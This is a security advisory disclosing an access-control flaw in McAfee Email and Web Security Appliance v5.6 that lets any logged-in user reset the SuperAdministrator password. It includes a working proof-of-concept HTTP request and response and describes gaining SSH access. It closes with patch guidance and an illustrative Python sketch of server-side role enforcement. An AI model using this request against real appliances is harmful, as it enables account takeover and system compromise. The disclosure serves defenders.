Summary
Name: McAfee Email and Web Security Appliance v5.6 – Any logged-in user can
bypass controls to reset passwords of other administrators
Release Date: 30 November 2012
Reference: NGS00155
Discoverer: Ben Williams
Vendor: McAfee
Vendor Reference:
Systems Affected:
Risk: High
Status: Published
TimeLine
Discovered: 7 November 2011
Released: 29 November 2011
Approved: 29 November 2011
Reported: 4 December 2011
Fixed: 13 March 2012
Published: 30 November 2012
Description
McAfee Email and Web Security Appliance v5.6 – Any logged-in user can
bypass controls to reset passwords of other administrators
McAfee Email and Web Security Appliance v5.6 (v5.6 1741.115) is prone to
various access control flaws, meaning that any logged-in administrator can
bypass controls to reset the passwords of other administrators.
The exploit would enable an attacker to:
– Having gained access to the UI (at any user level), reset the password of
any user, including the "SuperAdministrator"
– Having reset the SuperAdministrator password, enable SSH and log in to the
appliance operating system
Technical Details
I. VULNERABILITY
McAfee Email and Web Security Appliance v5.6 – Any logged-in user can
bypass controls to reset passwords of other administrators
II. BACKGROUND
McAfee (owned by Intel) is one of the world's best-known providers of IT
security products.
The McAfee Email and Web Security Appliance provides security for the Email and
Web protocols, and acts as a firewall and gateway solution.
III. DESCRIPTION
McAfee Email and Web Security Appliance v5.6 – Any logged-in user can
bypass controls to reset passwords of other administrators
IV. PROOF OF CONCEPT
Although the product does implement basic role-based access control, this
is not enforced properly (it is only enforced by the visible menu system).
This means that, having gained access to the UI, an attacker can perform any
function they choose, even if it is outside the scope of their current role.
An example of this is resetting other users' passwords:
Any logged-in administrator can bypass controls to reset the passwords of other
administrators. This includes resetting the Super Administrator's password
(without knowing the existing password).
This password change can be made by any user with an authenticated session
by making the following request with their session token.
Request:
POST /scmadmin/19320/cgi-bin/rpc/resetPassword/42 HTTP/1.1
Host: 192.168.233.40
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Content-Type: text/plain; charset=UTF-8
Referer: https://192.168.233.40/scmadmin/19320/en_US/html/index.html
Content-Length: 58
Cookie: SCMUserSettings=%3Dnull%26popcheck%3D1%26lang%3Den_US%26lastUser%3Dscmadmin%26last_page_id%3Dsystem_groups; SHOW_BANNER_NOTICE=BannerShown%3D1; ws_session=SID%3DSID%3AD3207A76-061D-4280-8A2E-8CA7FA712BB8
Pragma: no-cache
Cache-Control: no-cache

{"adminName":"System Administrator","userName":"scmadmin"}
Response:
HTTP/1.1 200 OK
Date: Mon, 07 Nov 2011 10:59:48 GMT
Server: Apache/2.0.63 (Unix)
Vary: Accept-Encoding
Content-Length: 75
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=utf-8
[{"errorCode":"0","jobId":"42"},{"password":"MXVT","userName":"scmadmin"}]
This new "scmadmin" password can then be used to log into the UI as the
Super Administrator, enable SSH, and then also log in to the operating
system as "support" via SSH (with the same password).
Fix Information
If role-based access control is implemented, it must be enforced on the server
for every request, not only by hiding menu entries (otherwise it can be
trivially bypassed).
Update to Email and Web Security 5.5 Patch 6, Email and Web Security 5.6
Patch 3, or McAfee Email Gateway 7.0 Patch 1.
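The enforcement gap described above, shown in miniature as an added example (this is not McAfee's code): a dispatcher that relies on the menu to hide the resetPassword RPC, beside one that re-checks the caller's role and the target account on every call. The role names, permission table and password handling are assumptions for illustration.

```python
# Added example (not McAfee's code): the access-control pattern this advisory
# describes. The vulnerable dispatcher trusts that the menu hides resetPassword
# from low-privilege roles; the fixed one re-checks role and target on every
# RPC call. Role and endpoint names here are assumptions.
from dataclasses import dataclass

SUPER_ADMIN = "SuperAdministrator"

# Assumed permission table: which roles the UI menu shows each RPC to.
MENU_PERMISSIONS = {
    "resetPassword": {SUPER_ADMIN, "ReportViewer"},  # viewers: own account only
    "viewReports": {SUPER_ADMIN, "ReportViewer"},
}

@dataclass
class Session:
    user: str
    role: str

class Forbidden(Exception):
    pass

def reset_password(users, target):
    """Constructed stand-in for the appliance's reset: stores a fixed marker."""
    if target not in users:
        raise KeyError(target)
    users[target] = "<new-password>"
    return {"errorCode": "0", "userName": target}

def rpc_vulnerable(session, endpoint, body, users):
    """Any authenticated session reaches any handler; RBAC only shaped the menu."""
    if endpoint == "resetPassword":
        return reset_password(users, body["userName"])
    raise KeyError(endpoint)

def rpc_fixed(session, endpoint, body, users):
    """Enforce the menu's permission table server-side, then the object-level rule."""
    if session.role not in MENU_PERMISSIONS.get(endpoint, set()):
        raise Forbidden(f"{session.role} may not call {endpoint}")
    if endpoint == "resetPassword":
        target = body["userName"]
        # Only the SuperAdministrator may reset a password other than their own.
        if target != session.user and session.role != SUPER_ADMIN:
            raise Forbidden(f"{session.user} may not reset {target}")
        return reset_password(users, target)
    raise KeyError(endpoint)

def outcome(dispatcher, session, endpoint, body, users):
    """Run one RPC and report 'allowed' or 'forbidden' (useful for audit logging)."""
    try:
        dispatcher(session, endpoint, body, users)
        return "allowed"
    except Forbidden:
        return "forbidden"
```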